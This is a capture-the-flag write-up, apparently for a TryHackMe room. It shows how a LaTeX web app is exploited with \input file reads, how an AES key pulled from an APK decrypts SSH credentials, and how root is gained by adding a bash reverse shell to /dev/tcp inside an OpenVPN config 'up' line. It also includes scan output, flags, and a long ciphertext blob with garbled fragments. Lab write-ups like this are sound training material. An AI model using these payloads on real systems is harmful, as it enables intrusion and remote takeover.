LaxCTF



writeup

------User-Flag------

- --ran nmap scan and found open ports 22 and 80
- --ran gobuster scan on port 80 and found directories
- --port 80 is running a texMaker latex web application that takes an input and creates a pdf file from the output given
- --was stuck for a while, did some googling and found the exploit 8297 from exploit-db saying to input "\$\$ \input{/etc/-passwd} \$\$"
- --after going through the output od /etc/passwd we get the following:

king Lax

=opt=secret

- --we now insert \input{/opt/secret} and get what looks like a AES 128-bit hash
- --note that hash for later and but we need more info, run gobuster with directory-list-2.3-medium.txt
- --found hidden directory /Google-Earth containing an apk file, so I downloaded the file:



--ran apktool d app-release.apk and was given a folder containing the decoded files

--found the key and vi in /LaxCTF/app-release/smali/com/example/a11x256/frida_test/my_activity.smali key = "sUp3rCr3tKEforL!" vi = "sUp3rCr3tlVforL!"

--used an online AES tool to decrypt the hash now that we have all that we need, and we get a brainfuck cipher string --decoded cipher string and we got a reverse base64 string, using Cyberchef, we reverse it and get a base64 string --now in cyberchef recursively decode the base64 strings until you get legible data. I counted 15 times until youll get the credentuials:

king:tryh@ckm3w4sH3r3

--now we must log in to SSH and look for the flag. Run ssh king@<IP-address> with password tryh@ckm3w4sH3r3 --found flag in king user directory and ran cat user.txt

79d798fdcfd3829c7420892d8988d5a7

-Root-Flag-----

- --tried sudo -l unsuccessfully
- --found files that are both empty files:

.sudo_as_admin_successful tryhackme.ovpn

- --found an artice about getting a reverse shell from an ovpn file here https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da
- --it says to enter the following into the ovpn file where tunnel IP is your tun0 interface IP:

remote 10.10.144.11

dev tun

script-security 2

up "/bin/bash -c '/bin/bash -i > /dev/tcp/10.2.27.69/4444 0 < &1 2 > &1&"

--run a listener with nc -lvnp 4444 and when the cronjob runs you will instantly get a root shell --after shell spawns run cat root.txt and get flag:

4dad5e736a26999c9d7773464013dd41

scans

-----nmap-scan------

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

2048 d4:d6:a4:23:aa:3c:82:90:79:83:7c:7f:8b:7f:d7:a1 (RSA)
256 fe:8e:ba:9a:4c:79:51:40:ee:d2:9a:87:5e:d1:d5:6f (ECDSA)
256 71:40:0d:f6:2b:74:d6:eb:b6:53:f3:83:2e:c0:bb:67 (ED25519)

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

http-server-header: Apache/2.4.18 (Ubuntu)

http-title: TexMaker

Service Info: OS: Linux; CPE: cpe:/o:linux:linux kernel

/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/assets (Status: 301)
/index.php (Status: 200)
/javascript (Status: 301)
/pdf (Status: 301)

/server-status (Status: 403) /templates (Status: 301) /compile (Status: 301) /Google-Earth (Status: 301)

hashes

```
AES/CBC/128
```

d2X+7fLZAq4as9qs7yGRdWANgbFVDaly2j2TjnKbeCq8bH3iR2XpyXBVjSCsrGLmTAhyffVoOgbhmVl5vDDMNvC6wJNfEZWa+MkF8H0qipjUStx3N69Wc7f3QpDVKRmGudEPhw0AMnnblCAvCNPoXldyOK3l2zKM+za8z7+7V6Ut5gWCKQezKa+l91GNQWj1iUKU0rlzTmr4mffL4L511kMnoTEEm6m9dkKDSqdmKzR3JXTpsSa6cLnqZED4grz26iRHm8eC1a9nZH2F+FPl/4GOSm5naTqzoeeo/-5cKZOgiv53AAlaQV7grVnWXU2VHAYBnHGn/-

T7NYLm01y1xhOYKtsP/BrxHOqJSg0TiTRmWKfodZuSEWnjHBZ8fclzrjyOxlrjDm9WaTu/-

OkRMsb0EhC4kYRTsRbrw081S0TkOh+PSSGMw2uBkmzxlOoL36WQl+JIVVrNXE22yfxpeV/aRFO0/HYh1taFL2gdItd5XK/-

q3e7cy7at9bfvlkkfknWWM0rdWQKftc5M1HZpfqvJjbyvMYH3kNsl6CcCaDUTX5svZPil9PwKNp8cdrhS9bzGwuLIZ4qwcN77LC3hAtNgeHJMtYkeByMoxGT/-

eJlxkHyzMudTXoDLQyRBRJ+Te9e66SJ328zqkiun7+N9rgGW7n9ycPAaIoNQLgxm0VSL95sE0GqvKviN1E4N0+7B0rUF0AZ5pmFmh6nc14E0dGXhXZdQRY2K6oUYhKsF6KVfYzERs04FA3RjdSci3j9IX/-

EVY3fUZfWNIp4DxiCmPaWCuJLikk3CeWYPNyAAAtdxYzfW9tqBsKbKelidiwSRuP2ogG+Cd9Vsmf6r94swQE57/-

xs63XYUz2K64minpsv+SVBw5MqpsfVe9C4e96ECdSKdoTdfJtTjoVk2YKyR50EOcBOhrOkrcE5WZJXrW3be2NJ4Ii3wkeDYwmOgeMA0I+k4Vd9QYB9Wrydhr/hicsdUn4k8MgIQtayHYz9b7Eekbo1SZkqfIImnpjLfQD/ZI/-

LTB2IuPtx7ydtKsMVqAVL2aMH8LnT8WzWdRwnDZTwXEWJftXB503JSJEeYB6T+rQPUzKK8SzE6VtgWnq1vaR8ZjIUYheEXzmZuIF3ykRq9sqE0dCRE8IsS2xn09ILU+qf+RfpEOTgBX8S2uw5v8CpiN1dvJkYzwfNIW7mPSzaRi1+RWDJmZ72gN2N3o82zTOaVb/-

7I9JRgP75NDXp1B2HkpGnI0jLpiPbiU0WyN3oi+xgkM7cE/I20K0pvAUaHhZADGh62Kv+bMsTUw/B3/-

Ci+oty8jbPxExlH4GB7jdQKMlg8wCjPg0GeGwdSAtACsgp/-

Dz5PkeukEmijBI9S3yMXHeXVHvsEm3efkxGOeWVMg1YpDnJk1SC0Mq7tOLa/-

BJdzYWZkj9kfV5uyY6FfeILZzur0AecWOIbdvezKc5NkUIm2328h7ATZ2Ek+O6Z762gmb01HfVILq+v2POMP2/-

h1S3i4MSLAZ8Qdt2ieKe1ddORDAzSm0v3OQ1xhZ3E9sBcW8pEtYt7J+6S1ANew9boAAwWZ/5O1ldpSn18TAYWdI/-

vS1RiuXVfKkmdhmXXBE3vnwNJQNsp1oTUaS7X+IF7PkWPyZDrhNwUeX9dwbUxDx+NYsL44D4ahKz1sFogaWVn5BhLi38OLpRe+5i9 YzdYLYTrNM44ihqB7v8DXkkCztZGuUR9XHHEXVG6ec8NnV9JkKQGYwfA3Bepo/-

pShZRmoq6SnKmw4APrihx7mDUj4JiA3dBDN6h7z24s0mwfyCrYDtk7OPBnAcl97ktvE0NoJ1RUUdwxFxfCBP/stTO9T/-

FHiuwZZghuf5heFwKEvlicN8aRGZlimcSPelSRhFLMUhQoGpehwN8bIWETsuB2MoByENv3YlCLJTXNDKwoB+09zAM4g6PrFJwk9t/-aLSyhuaH4PYPPv7txNGMvzydWSzi01hisQYJeoI+t7HJL05mwKEHg3ekn6CTbS2VS4V16pjksiZHN62pTZmedRupGdki+QrlGYVBb8jB6du6L0jZQhW7MxW02GH2gwyx6GJBcTgG6cZcTughUgCiYAeM6TrKTMI9UaDKqok2kyOs8ZX/h+p5UFL3jOs/-

vQSr5kNGB8pMV1GD+Ij9KUbM1SZ9owmseDnudlCHVy5I7FlpHt/-

Q9vBEvVYOroRBSaLOh3OdIg9JWNKn9DqS6w6vYFaVLNpYjl1p9GbW1hERyT2ZsrHtzbWkwqRbnWDD2gl5G80zjfL3lkf6/-b2MbBspcmCKl15JpdnALU5Z2Yvf6hrlOfhr/-

A+TsJSvzDAy11f5eGoyPkDYt1JPjJYv3gIM3Zsyw5VRPhSw2WwzlcmeraPp8wEUZQMowplWI7u4v2DHjop4GsOUu8Z0UQYKzCW4kVqvXm0/S+p1jkQsrVbIb0Wt19is1WZ3F+M8xfBALC6H7TAS0LFPFCMOJ0gq5IY4sUezo89KZ92mVcyrilt2UrEiFYPoJ/EGMuIS62SwD/-

wWhWfyXVmPKLLAKd6htxby1Hv46uTk0rL5zpDkkanjxxqVaB7Zyw/-

nBTikXIb4017PNH0u85FmEnCCEWyG0BGR+VKPjst9ImUPXRq9bQNe8ytPZ2FX7pXIYimAw1zyEeTPn9f8T8TysYCy7290qBdR/-LqnY8JGnlLf79W68BYF06PT760zuVoOuSdwDrUNIckmsKmqNaoY7srasXV1zkt+3dkdaCnquRCfVBpbzmuf6fVsyByHwBU4kTX+pyiu2uhQVTkdvrc+rKi5kUFIoNxXNTYJ8Q3PftbqJ5Yino4C2tHDa4gZj4pPd81nfaPRihq6YvPqkzcItAOtnTa+mvjvv1IbMfCnRNcKeOx/-mq8kZR5nbggDBUt70eWTxQPo6Alok8B+LAnRQ+6B9+p6mN8Gwex2gjFpu7K/-

niEhCeFACWeTxQhzo3g0oFWw2hCgNI5dViZrPewzRnOg2GzkjasE6F12o9yVpQ3RkEnYlgZAIF/V39+XtKKptlLs/-

7e7wWABiEcyN7TpPWY82I9Ku04cxj1D1kJUmVCXN3q5eOAoOsRMhHNDE1K1Hw8mgPErLtkk+6bkJrZYljgUmGqaAN8HNo05nvnc1A3sXCzm7dHw1Rmf+wApyE6QMcM30echAkz63VksJdXCuxfMu2/-

qoZ9wsm3wUZBH1ZwJEgNxXWrjbsZhGfARFdUOePLEckGvaO9M1KIjxsIp6DbaWOS2H+IEWY147VBLEvix7khNu1vSr4EZd6ykZBWIdG7tgwfQXsIUwB0/U91jHiiCY4gMJHjNkP/2Vp16jLvAgG6IqMFOGINrnUe4S8SpaMMIK577eWpFV8Lob70UsVck6uXUf6o+tJ0iBXf/-

H860zDOi2Dum/k/5u6ZT2Tq5uh4gvug6KXJE5oJjuW6bf5Nebb1aIKsJAbodE2KZEz6vBdvj3wXPOXzOn3XqWCr0Q9Wbnqh/-

mCJZCWxJEbN4rlhHom8wSOxhvov06D5nLeE+AVk8CKjtclOozBMNlYkYEz4PpkuDeuBom6d55e+QN2YVWvl8PCGaV8uqiiujXa+D54 3PtPXerQv7tq3rhkHdcbjoS264o4j3m89YK25pFGpoCDs0Tlb3lD8N9tCcAtjBef/-

52Cf19DNHZeK90g5pAzQkYZlaemPDuXNZbo9ar1ZSYCQ9EYIDEgjA5wXGLVC0V94qeSY+SpN6dr4sVjSnJ0n0/-Uk7rX+So3OzY7h/-

LTi310dtJ4BqwTnUv5sG7lXupX3E72NMtEwpncDvbXf6Wl2rPupsi0vCQQVAMNF1JMKNzdMikEFhfvvEDYT1hz0vWLmFZss4hUvvnxpmW26vuFL8lUSm3JU3a7n4NhAtnfEzvqLnzHsRlBF0aWwq1lHE9VyzHqk8KXbW3u9EMe4PC4QA7sWwtlkcCnSUyDg5XxAuW35Z3Lh3klzh7tk6METzkLmyvoSOe/kS7h5ypshf0gXBWT9iJYbMLHjrODW2oQvj/-

1RVpLZqC8H63CjX4+U4+RRInFOcIZtaw2rS2syuszQUBrri0Lu1+KMO3WaNwoyGGNOP/-

97284Awy0foAzufltdMn+xD9o4PHj5gdtgMB6gMJEWEC+phX9An24G+lCSLZbyhZ3pnxrtYws1MaKtdF49RDpNKaU56cTBV13t0irOlm7hFGhBYWDLUNvRNgYE9OhnHc6ATin8loKECMwvmCoQP94CWPXzunPjx9e04b43DCFjx3tudtOM8SYCza9Acl6pmHRVvIMyQBsDVkSjx4bP9/-

eTuTgLURmzIQJk5xMrIXuO7a2IJRS1RNAKLXuXwimVHQBsW5MWcMc1Fham4ImR1f4KuAnwcNGnRBpQEIoto98BQxwVugsATAIFCL57pe13VBe8P7S0ep9IyqZmSquNuOrh0A/hEa/QudSnBtI5MvsZTXnpq9Vj21q/MMsd6QkR/-

BnNmtG3dTWoU9K5E4TSCLQiJgyoaaU6u3P9kDZsi2WkqNg4mRN42P43TBxegwPsA07B5RNhW4PyyWWDD6km8pYycK9SkGLfbpUwF2+UA/-

bSMo4s5BAxxupmBnYViEq8yGX2Cn6TwfksSZhuEnNvPa1TljoCClY4eqG5FoTHBixgv4+yyZ12AbUv505vpDMiH9JnmPYCYi6ZyRr1+KQzlzfLExlTm3BPj1LknB8syuDeA8OrvPWRyY2dHOIUtrynP5zr6nL6VldiHbWhl4jJEdpu5IxxAlgxYGnswH9SRi4D4A64+JBIJwlPWNf/-aRp6Mi5C8nmrmyvfaNEDankMSKtPrGyQhDxm4AyLKNdqT6ZS3YZg71/-

fvwxHCzYI9VjHDCm8mc90mZy2O91j5Er8kfjYoGXM5Q0e4kpLU+3sHn1d+mnj28Rh/WQcFMmv/-

m54r4ZJQX2hF71zYwu3NT+se2uzmlQtACKdZU+anxnWyD91KlxH2PKTwlC5UsIbnAvQQNYlnJv/2Acgxc/-

uu9vpUl1XZz6G4gCp3n11TkKXQ7YhPR3v8CQcpXFeceOL0zEbQCbh6u1CXHb2MD90l9SjSitUWvM+I+328tBH5fDNdIHgDr76nbKQlwo/6Rl37bcVi2oL7afwfuE/-

bbbz0VdkNbnJdHJB2Fv348tyeECMiXaIr9WbGfkKqIuLnHLmUlCvhoidvpR+GOeP2Vpsb62DURuRTLiL4hhuIHHMEa6s3hFLySWcs7X0wZJDIIB6+t9pxmUv87k1ud28uI2GoM+fLI5kzsf3UR6GcCuKn7jRsJCBtXO7Po7FTfhxE5HJzfocEGnJ8ydD0ItEADXJ4fKR5J89oMWNRqr:ZWcA75RBIMIIvfv4V+0sZJNSPwuksICXYmHSr/-

2rIHxV232LnX3xYm4zyJZvcZiOiy7G4NZF+7i2N982GHeYB7JEbFT36fJecCkLsA2ucDINFx6Pqw4OLEkAozI2A8kepn1d5c9kSwuvnpY7scdh1lFIriqG//kxxFgcXwYDYE2ObsKwA+5SXKr2YChWcJUEJKU2V9bgqDCcpPiQq+5hkFefrtt7VvWeW/-

jDDzTGbLaGRC5BPBdQcjJPo8PxhH/iobgcu/-

FqT+epx3ZS+pJ4fe9uhBGWURpmw8HRBgJ9Anb5BiQDRqKiwxGQYlDDgtDhpaaJTqA0YnOeL9SCR0rf8FvYvMqT7Y8IbgVXRm+YY405+tdCfrR3Xa7L80vJ9kcYqKtvZC3gXCanpp8h+27g5Val5p52QadTSCOgqRH8DPs6T+3dcMa/nr24BItImggFc0S0uJsKCfrRF/-

XL73kl87Ho0+f56QlW4xzGL2yX0OM9wzjUgnJ73aVvMptJkvLdxslDdDl0Ydv0qvNkCSMcRlh2A2YQh1dor8GEoCFCajNDz54aNKXvdXRUEo0KtRLQKxd6RwNZvHeNts35FLPLOjPm/-

x5+pSdxqe5G8sMCercLouKwveOfoYzBIKWxuIGrFxtLAM2AL9zpBjGHpoInsP4HxiM5ucORRSeEq1b2vTRWe5cL8BcoObh0lvbNfKsflm NXvVvb2JD85xbh0sCnE4pXpeNAcAR5a0ek53IARqeKkWqcoIF2DIPbpG0fNuaxqniF/-

i3IYRvganfwZ5GQM+52Rx6H5ZaBLMG3H+PrOMWhABbBtGdc8gdVPVil1jaehu4gqU2IzFIHIhC7ULJ8zt7AgOV1GQuZpcN8R2UbHuw 0Z8TiMRSdAK7P+RB+dLrpMJhjhGaV8VDkgS2dKFkMjoX8Cc4TMAho3GnnRqI/L+r1JS/-

Y46TkKklOUrClut646ZFAjv8CZqIWiZqynMjWnMZgBpXSnvjn5zqOf2F5BnfZP04XwIGV1crFyB8/-

E8vgW1jSH4BIMRpm9tqUeup5MHHFQWuz4NEqIKJpIHhhWfE5YUIr6gQFwRl8uE/-

5Pz1FWrqz06q2roXU+DRMBvqYg2svBlgaIj1BATxLwWpRSKSciaFPsOYaEKE4vfArc5jMI5xGohKRV80e3myfe6r9VCLdxEsnIf8QoEcaI3txHePX0IiV0DSFEbePRdGFREkW0zAlbEO+XXACSwxgP/-

UR4Qbk3AfgFS8rITmpc+UixfSs8YerB+rkJPpYKfXHVpSYmaVQGbquM8EdinLIYRYJNPB8pCC7u3Aj8IWvjYhyINwMieIhpZaOWw6YpGD0NafbGsPJ0F7dgFCAz45EI+jX12Mjbnuf/Oi3GIJz4HYhTFRycZW/ksX4/-

KSEsSmQ2QodVjscJLrCtmeDmLJsGzVh050GF+D8I5PoQ9O0HhoiuqjbYtbjncpaNvGOYLyriilAajYXHjpB73uCPvfx6vfz0CS4xkPymzWAxFGU2CM4a8ZbsJyHnzA/-

AyZ4fBPBBDbCbgw8lF9jg8u8UhDl8l4JOX3rYrXpzTliQSyJ2rs9RWBnGX8RgHfVDNwsdfDBGwdDRomwGC2ZO0JWfzscenvT3gjJGXfLJ3lUdjwStv4TojLHiN60U7dZG4po1b70awCfsgaNe/qHMhQSpuSQtPU6X7tDXX5uVTRa/-

rjVaES1Is0yv3wkPqO1fDM6KsIvOd2hI+JaELE61S+jMP3tUgi+zDmrftlNpEJAy4XT1nl/JR82XTSPmBhB8pYC9tLaGI2//-

Gu5kZpWueT0jRw9IyIWJbuR9CWHMmSKy/-

0VpYmWBlsnMfjdvPWTNI0FL9+m06wzxjEYX3OrKa7UraSn5TrvT0NkQja9C23Uxyd3bq53wilcY5qb7N/-

BCm2JaCwmWi+4p6JSMCnXeRE98idHZmgcFgubaUKbFLVrUqFYZLOor5V/-

yeOvwfe5VldjOjwSduiUWDPjVAp8Wc+eYlc8veY+Wmxc/AFetGoRRMqWm5AvuORO7Lr1ItD2SIbyh2ZW+ohz/-

OcdDGIrdboxO2IIB0rAzlYnjg4u8byMlu0ppkcAA73+yY5k0CKaoJn6a81E10Fzhp1UuyrGw2dzCQLcQHzIXT89BF+pVV+9O/-

QulV8ipnN3+YZRUhwxcuHeMaR+cmaB5AQe9u5ZR2xVcJluIny9xkpAxpCDKG0PLEzGrNTftK6wKeEmszzjRtf/-

Z58MFhiK5sWTHIiUV059v5fH2FoKmaX+OJdwD3FM9Q5rLcRKrTxvh5OhUuo6XNFXS6G40FgOy8um+4avsgryig+cj1VhpI8amw5cu\dusJs3E6aJKD+8+XYNHYrmDp7qLlcyoDya8wYj3NAcWMrG2eUMTi6y7ScQfOOTICHD8dqp8vRFm+wDcppLoLTqgjjKBA5cH0N+qH6luPRR23+/Qy3SGU7cesWpfeEQa3ccCaYkL2get/xtUjAJ51eeXYAmbfHOXX2JIrKZZmtIkUhxB3UPpFAIVw1PVIx34tJIUQHurNYU/-

IQAFwo6rwRVuvD8ybdJvqMFyFsodviGYv1f+ee0uM2piFXIXsrY2gIp9JQ3pnEjuZJZXQ7+af8HY7BVqJHYrZcWjIsVHdSru7oqxOXcLSj3bFmfO9FVrDR9OBXiIBJaoqn6VacvPITOPH+mZ22WyIvTWo2NAtGQq4qKsS9R/-

wQ8dwEtjXxmCrLvlCPxe3Ab5jnoYDKETyOGWDp8tr8grBdrY6kY1FGApjrUILExXh+ML7JctsCDpJ2mhC/-

140oJ3bv6qUozCEFrvNUehCCC3VnY4pNAMMahb+sbFNp27ijjmVEw51Sxo55F8uFhabNKrmBrgkmqCxeft0pJYAOecF8TBC1n0pC/OZMcPFcGA9t522Z3KvEjyhWjDMKkgeyySyjodRLjgfZtefARaXUsgP1cVZ4gDDYsX7jRWy8Dx3o2p79E4faja+KlSPzPX8EtJHhL0/s5mDOPWpDtvVD9R/-

LJ3TcYA4tMsHHkaFlj0KaPiBc5Kckym7lYMHhiKkXdqulTyvgto6QE2XW1pvB2qNXL3WPRm6EMQVky1KLeKxEHKK4xJEkN35URZM9mQ\MDIsBF9s2asD9vfDXbw074C3gW3/-

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!

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-

